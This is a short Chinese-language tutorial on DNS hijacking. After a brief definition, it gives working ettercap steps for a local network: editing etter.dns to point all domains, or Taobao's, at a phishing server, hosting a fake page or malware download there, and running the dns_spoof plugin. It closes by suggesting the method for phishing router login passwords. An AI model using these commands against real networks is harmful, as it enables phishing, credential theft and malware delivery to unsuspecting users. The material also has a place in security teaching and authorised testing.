DNS劫持
-
DNS劫持简介
DNS(Domain Name System,域名系统),在互联网上作为域名和IP地址相互映射的一个分布式数据库。DNS劫持又称为域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,或者返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或者访问的是假网址。
DNS被劫持后,常见的攻击行为主要有网络钓鱼、干扰用户正常访问网络、威胁用户账号信息及财产安全等。
-
使用ettercap进行DNS劫持
网关192.168.0.1 目标192.168.0.205 本机192.168.0.203 钓鱼服务器192.168.0.207
典型步骤:
1:编辑ettercap的规则文件,修改DNS解析(最末端) nano /etc/ettercap/etter.dns *A 192.168.0.207 把所有解析劫持到此IP 或 *.taobao.com A 192.168.0.207 添加正向解析 *.taobao.com PTR 192.168.0.207 添加反向解析 2:在钓鱼服务器搭建网页或者恶意软件下载 3:使用ettercap及dns_spoof插件进行全网劫持 ettercap -Tq -i eth0 -P dns_spoof /// /// 可以在cmd下使用ipconfig/flushdns命令刷新DNS缓存 也可使用图形界面进行劫持 可以成为钓鱼获取无线路由器登录密码的方法补充